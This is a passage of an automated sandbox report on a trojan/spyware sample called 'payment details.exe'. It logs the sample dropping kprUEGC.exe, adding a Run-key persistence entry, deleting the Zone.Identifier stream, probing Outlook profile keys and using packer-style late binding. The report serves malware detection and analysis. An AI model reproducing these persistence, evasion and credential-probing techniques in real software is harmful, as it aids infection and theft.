                      Source: payment details.exe, 00000000.00000002.697919901.00000000077D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs payment details.exe
                      Source: payment details.exeBinary or memory string: OriginalFilename vs payment details.exe
                      Source: payment details.exe, 00000005.00000002.916754002.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameelxZSujHMHuHJxbAMwLHIgWJxBXR.exe4 vs payment details.exe
                      Source: payment details.exe, 00000005.00000003.898574525.0000000000E9D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameclr.dllT vs payment details.exe
                      Source: payment details.exe, 00000005.00000002.917609197.0000000000C00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx vs payment details.exe
                      Source: payment details.exeBinary or memory string: OriginalFilename vs payment details.exe
                      Source: payment details.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: payment details.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: kprUEGC.exe.5.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: 5.2.payment details.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.2.payment details.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@9/6@2/1
                      Source: C:\Users\user\Desktop\payment details.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\payment details.exe.logJump to behavior
                      Source: payment details.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\payment details.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\payment details.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\payment details.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: payment details.exeVirustotal: Detection: 31%
                      Source: payment details.exeReversingLabs: Detection: 33%
                      Source: C:\Users\user\Desktop\payment details.exeFile read: C:\Users\user\Desktop\payment details.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\payment details.exe 'C:\Users\user\Desktop\payment details.exe'
                      Source: C:\Users\user\Desktop\payment details.exeProcess created: C:\Users\user\Desktop\payment details.exe {path}
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe 'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe'
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe 'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe'
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe {path}
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe {path}
                      Source: C:\Users\user\Desktop\payment details.exeProcess created: C:\Users\user\Desktop\payment details.exe {path}Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe {path}Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe {path}Jump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: payment details.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: payment details.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)Show sources
                      Source: payment details.exe, ImageManager/Main.cs.Net Code: LateBinding.LateCall(V_6, null, "Invoke", new object[] { 0, V_0 }, null, null)
                      Source: 0.2.payment details.exe.800000.0.unpack, ImageManager/Main.cs.Net Code: LateBinding.LateCall(V_6, null, "Invoke", new object[] { 0, V_0 }, null, null)
                      Source: 0.0.payment details.exe.800000.0.unpack, ImageManager/Main.cs.Net Code: LateBinding.LateCall(V_6, null, "Invoke", new object[] { 0, V_0 }, null, null)
                      Source: kprUEGC.exe.5.dr, ImageManager/Main.cs.Net Code: LateBinding.LateCall(V_6, null, "Invoke", new object[] { 0, V_0 }, null, null)
                      Source: 5.2.payment details.exe.620000.1.unpack, ImageManager/Main.cs.Net Code: LateBinding.LateCall(V_6, null, "Invoke", new object[] { 0, V_0 }, null, null)
                      Source: 5.0.payment details.exe.620000.0.unpack, ImageManager/Main.cs.Net Code: LateBinding.LateCall(V_6, null, "Invoke", new object[] { 0, V_0 }, null, null)
                      Source: 15.0.kprUEGC.exe.3c0000.0.unpack, ImageManager/Main.cs.Net Code: LateBinding.LateCall(V_6, null, "Invoke", new object[] { 0, V_0 }, null, null)
                      Source: 15.2.kprUEGC.exe.3c0000.0.unpack, ImageManager/Main.cs.Net Code: LateBinding.LateCall(V_6, null, "Invoke", new object[] { 0, V_0 }, null, null)
                      Source: 16.2.kprUEGC.exe.7f0000.0.unpack, ImageManager/Main.cs.Net Code: LateBinding.LateCall(V_6, null, "Invoke", new object[] { 0, V_0 }, null, null)
                      Source: 16.0.kprUEGC.exe.7f0000.0.unpack, ImageManager/Main.cs.Net Code: LateBinding.LateCall(V_6, null, "Invoke", new object[] { 0, V_0 }, null, null)
                      Source: 18.2.kprUEGC.exe.c40000.1.unpack, ImageManager/Main.cs.Net Code: LateBinding.LateCall(V_6, null, "Invoke", new object[] { 0, V_0 }, null, null)
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_010C4120 push ecx; ret 0_2_010C4122
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_010C41E3 push esp; ret 0_2_010C41EA
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_010C40C0 push ecx; ret 0_2_010C40C2
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_010C40C3 push ecx; ret 0_2_010C40CA
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_010C4219 push ebp; ret 0_2_010C421A
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_010C42D0 push edi; ret 0_2_010C42D2
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_010C42D3 push edi; ret 0_2_010C42D6
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_010C444B push edi; ret 0_2_010C4452
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_010C4442 push edi; ret 0_2_010C444A
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_010C4490 push edi; ret 0_2_010C4492
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_010C4493 push edi; ret 0_2_010C449A
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_010CB18F pushfd ; ret 0_2_010CB19A
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_010CB1F1 pushfd ; ret 0_2_010CB1F2
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_010CB1F3 pushfd ; ret 0_2_010CB1FA
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_010CB30F pushfd ; ret 0_2_010CB312
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_010CB313 pushfd ; ret 0_2_010CB31A
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_010CB3C8 pushfd ; ret 0_2_010CB3CA
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_010CB250 pushfd ; ret 0_2_010CB252
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_012A4668 pushfd ; ret 0_2_012A4669
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_012AA6E5 push FFFFFF8Bh; iretd 0_2_012AA6E7
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_02614668 pushfd ; ret 15_2_02614669
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261A6DA push dword ptr [edx+ebp*2-75h]; iretd 15_2_0261A6E7
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_04DD1E80 push eax; mov dword ptr [esp], ecx15_2_04DD1E84
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_04DD1E6F push eax; mov dword ptr [esp], ecx15_2_04DD1E84
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_02B8A6E5 push FFFFFF8Bh; iretd 16_2_02B8A6E7
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_02B84668 pushfd ; ret 16_2_02B84669
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8AD17 push es; retf 16_2_06D8AD54
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8D25B push edx; retf 16_2_06D8D265
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.89257156143
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.89257156143
                      Source: C:\Users\user\Desktop\payment details.exeFile created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeJump to dropped file
                      Source: C:\Users\user\Desktop\payment details.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kprUEGCJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kprUEGCJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Users\user\Desktop\payment details.exeFile opened: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
